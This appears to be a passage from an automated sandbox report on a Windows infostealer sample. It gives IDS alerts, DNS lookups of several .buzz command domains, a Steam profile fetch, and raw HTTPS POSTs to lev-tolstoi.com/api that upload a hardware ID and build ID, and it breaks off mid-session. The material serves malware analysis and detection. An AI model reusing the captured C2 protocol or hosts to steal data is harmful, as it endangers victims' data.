| 2024-12-28T09:56:45.440158+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49731 | 104.21.66.86 | 443 | TCP |
| 2024-12-28T09:56:45.444253+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.5 | 49731 | 104.21.66.86 | 443 | TCP |
| 2024-12-28T09:56:48.868512+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49738 | 104.21.66.86 | 443 | TCP |

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:27.837812901 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:27.838128090 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:27.883980989 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:27.887820959 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:27.931329966 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.598068953 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.598092079 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.598134041 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.598151922 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.598182917 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.598261118 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.598285913 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.598304033 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.598334074 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.770256042 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.770323992 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.770423889 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.770451069 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.770493984 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.806453943 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.806512117 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.806535959 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.806617022 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.806651115 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.808012009 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.808036089 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.808065891 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.808073997 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.956239939 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.956286907 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.956367016 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.956726074 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.956737995 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.264096022 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.264240980 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.267081976 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.267091990 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.267398119 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.268735886 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.268775940 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.268800974 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.996532917 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.996634960 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.996702909 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.997463942 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.997479916 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.997493982 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:30.997499943 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:31.020637035 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:31.020695925 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:31.020802975 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:31.021178961 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:31.021193027 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:32.278631926 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:32.278763056 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:32.285232067 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:32.285269976 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:32.285563946 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:32.287007093 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:32.287036896 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:32.287080050 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.056737900 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.056787968 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.056823969 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.056843996 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.056860924 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.056886911 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.056906939 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.056945086 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.056978941 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.056984901 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.065097094 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.065191984 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.065208912 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.073435068 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.073502064 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.073518991 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.118351936 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.118376970 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.165211916 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.258390903 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.261987925 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.262069941 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.262078047 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.262119055 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.262165070 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.262185097 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.262371063 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.262398005 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.262430906 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:33.262447119 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:47.937352896 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:47.937573910 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:47.937599897 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:47.964694023 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:47.964755058 CET44349738104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:47.964868069 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:47.965250015 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:47.965259075 CET44349738104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:48.868511915 CET49738443192.168.2.5104.21.66.86
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 28, 2024 09:56:24.893279076 CET | 192.168.2.5 | 1.1.1.1 | 0x4a49 | Standard query (0) | mindhandru.buzz | A (IP address) | IN (0x0001) | false |
| Dec 28, 2024 09:56:25.050343990 CET | 192.168.2.5 | 1.1.1.1 | 0xf002 | Standard query (0) | prisonyfork.buzz | A (IP address) | IN (0x0001) | false |
| Dec 28, 2024 09:56:25.192960978 CET | 192.168.2.5 | 1.1.1.1 | 0x8d72 | Standard query (0) | rebuildeso.buzz | A (IP address) | IN (0x0001) | false |
| Dec 28, 2024 09:56:25.335802078 CET | 192.168.2.5 | 1.1.1.1 | 0x4594 | Standard query (0) | scentniej.buzz | A (IP address) | IN (0x0001) | false |
| Dec 28, 2024 09:56:25.477482080 CET | 192.168.2.5 | 1.1.1.1 | 0xcd2e | Standard query (0) | inherineau.buzz | A (IP address) | IN (0x0001) | false |
| Dec 28, 2024 09:56:25.618978977 CET | 192.168.2.5 | 1.1.1.1 | 0xa290 | Standard query (0) | screwamusresz.buzz | A (IP address) | IN (0x0001) | false |
| Dec 28, 2024 09:56:25.766927004 CET | 192.168.2.5 | 1.1.1.1 | 0x1613 | Standard query (0) | appliacnesot.buzz | A (IP address) | IN (0x0001) | false |
| Dec 28, 2024 09:56:25.911825895 CET | 192.168.2.5 | 1.1.1.1 | 0xadc | Standard query (0) | cashfuzysao.buzz | A (IP address) | IN (0x0001) | false |
| Dec 28, 2024 09:56:26.054369926 CET | 192.168.2.5 | 1.1.1.1 | 0xe10f | Standard query (0) | hummskitnj.buzz | A (IP address) | IN (0x0001) | false |
| Dec 28, 2024 09:56:26.207211018 CET | 192.168.2.5 | 1.1.1.1 | 0x9cd4 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false |
| Dec 28, 2024 09:56:28.815592051 CET | 192.168.2.5 | 1.1.1.1 | 0xada5 | Standard query (0) | lev-tolstoi.com | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Dec 28, 2024 09:56:25.038608074 CET | 1.1.1.1 | 192.168.2.5 | 0x4a49 | Name error (3) | mindhandru.buzz | none | none | A (IP address) | IN (0x0001) | false |
| Dec 28, 2024 09:56:25.189775944 CET | 1.1.1.1 | 192.168.2.5 | 0xf002 | Name error (3) | prisonyfork.buzz | none | none | A (IP address) | IN (0x0001) | false |
| Dec 28, 2024 09:56:25.332601070 CET | 1.1.1.1 | 192.168.2.5 | 0x8d72 | Name error (3) | rebuildeso.buzz | none | none | A (IP address) | IN (0x0001) | false |
| Dec 28, 2024 09:56:25.475446939 CET | 1.1.1.1 | 192.168.2.5 | 0x4594 | Name error (3) | scentniej.buzz | none | none | A (IP address) | IN (0x0001) | false |
| Dec 28, 2024 09:56:25.617038012 CET | 1.1.1.1 | 192.168.2.5 | 0xcd2e | Name error (3) | inherineau.buzz | none | none | A (IP address) | IN (0x0001) | false |
| Dec 28, 2024 09:56:25.762442112 CET | 1.1.1.1 | 192.168.2.5 | 0xa290 | Name error (3) | screwamusresz.buzz | none | none | A (IP address) | IN (0x0001) | false |
| Dec 28, 2024 09:56:25.908227921 CET | 1.1.1.1 | 192.168.2.5 | 0x1613 | Name error (3) | appliacnesot.buzz | none | none | A (IP address) | IN (0x0001) | false |
| Dec 28, 2024 09:56:26.050906897 CET | 1.1.1.1 | 192.168.2.5 | 0xadc | Name error (3) | cashfuzysao.buzz | none | none | A (IP address) | IN (0x0001) | false |
| Dec 28, 2024 09:56:26.203795910 CET | 1.1.1.1 | 192.168.2.5 | 0xe10f | Name error (3) | hummskitnj.buzz | none | none | A (IP address) | IN (0x0001) | false |
| Dec 28, 2024 09:56:26.427820921 CET | 1.1.1.1 | 192.168.2.5 | 0x9cd4 | No error (0) | steamcommunity.com | | 23.55.153.106 | A (IP address) | IN (0x0001) | false |
| Dec 28, 2024 09:56:28.955377102 CET | 1.1.1.1 | 192.168.2.5 | 0xada5 | No error (0) | lev-tolstoi.com | | 104.21.66.86 | A (IP address) | IN (0x0001) | false |
| Dec 28, 2024 09:56:28.955377102 CET | 1.1.1.1 | 192.168.2.5 | 0xada5 | No error (0) | lev-tolstoi.com | | 172.67.157.254 | A (IP address) | IN (0x0001) | false |
                                                                                                                                                                                                                                              • steamcommunity.com
                                                                                                                                                                                                                                              • lev-tolstoi.com
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.5 | 49704 | 23.55.153.106 | 443 | 5856 | C:\Users\user\Desktop\3LUyRfIoKs.exe |

Timestamp | Bytes transferred | Direction | Data
2024-12-28 08:56:27 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Host: steamcommunity.com
2024-12-28 08:56:28 UTC | 1905 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:56:28 GMT
                                                                                                                                                                                                                                              Content-Length: 35121
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: sessionid=f9e54bfcb159df67606b40d3; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                              Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-28 08:56:28 UTC | 14479 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-28 08:56:28 UTC | 10097 | IN | Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-28 08:56:28 UTC | 10545 | IN | Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.5  49705        104.21.66.86    443               5856  C:\Users\user\Desktop\3LUyRfIoKs.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-28 08:56:30 UTC  262                OUT        POST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
2024-12-28 08:56:30 UTC  8                  OUT        Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                              Data Ascii: act=life
2024-12-28 08:56:30 UTC  1121               IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:56:30 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=a3rlk3vei0rtbr6hgt1jq6akbt; expires=Wed, 23 Apr 2025 02:43:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Da3dfgRjnYdw9dWHr8342mTqG0Mf8KrArFb4D5P%2FZ2zy7xqbZuuH3KMqD3FJNBPu2R1wPyz6Eu2GQVhV6LfH%2FUi2ABCb1HUiLRcmwWPB0g8bMXPiDjoCuuMWU2VRmay2Njk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f905666eadb421d-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1569&rtt_var=598&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1815920&cwnd=177&unsent_bytes=0&cid=9b48787185fd0059&ts=743&x=0"
2024-12-28 08:56:30 UTC  7                  IN         Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-28 08:56:30 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.5  49706        104.21.66.86    443               5856  C:\Users\user\Desktop\3LUyRfIoKs.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-28 08:56:32 UTC  263                OUT        POST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 47
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
2024-12-28 08:56:32 UTC  47                 OUT        Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-28 08:56:33 UTC  1125               IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:56:32 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=vjh4der4la46fbubj40mr9gonb; expires=Wed, 23 Apr 2025 02:43:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6YFFIuwCBY8q0xtHMGuXPNooCBlgvuTB6fZZVrWqqx%2B4UVzj58Um5B%2FcDkp92%2BN0MlBnc8kM0IGdnfaIaACeK5Sp98f9uOP16yMI%2BqQgMDPbcQ1mHcyl8tzxUHRybCQ5pFg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f9056737a35efa7-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1808&min_rtt=1799&rtt_var=693&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=946&delivery_rate=1558996&cwnd=161&unsent_bytes=0&cid=bb10daa80234ba29&ts=783&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49707 | 104.21.66.86 | 443 | 5856 | C:\Users\user\Desktop\3LUyRfIoKs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 08:56:34 UTC | 273 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=DXFUN3R3CE
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 12787
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
2024-12-28 08:56:34 UTC | 12787 | OUT | Data Ascii: --DXFUN3R3CEContent-Disposition: form-data; name="hwid"D723E1129B685441BEBA0C6A975F1733--DXFUN3R3CEContent-Disposition: form-data; name="pid"2--DXFUN3R3CEContent-Disposition: form-data; name="lid"PsFKDg--pablo--DXFUN3R3CEContent-
2024-12-28 08:56:35 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:56:35 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=uhlfrt1trsig4jv1b0e5kd6pmu; expires=Wed, 23 Apr 2025 02:43:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NmDrDkmb9P8RdXtnkLgbiUTantteQrD9iOKylIQ35zUVbO0a5FLaMx%2BI9oCyLjZzgSY2P2MvTAH%2Bc4ei%2BWWY%2Fn6NBb35OhjaTdPZ3E9UevQIt0UOxgcWpIpE0uAEfXhmlyM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f905682cd140cbc-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1452&min_rtt=1443&rtt_var=560&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13718&delivery_rate=1923583&cwnd=175&unsent_bytes=0&cid=da4eca5edc7fb8c1&ts=930&x=0"
2024-12-28 08:56:35 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-28 08:56:35 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49709 | 104.21.66.86 | 443 | 5856 | C:\Users\user\Desktop\3LUyRfIoKs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 08:56:37 UTC | 272 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=TYYEVX5PB
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 15023
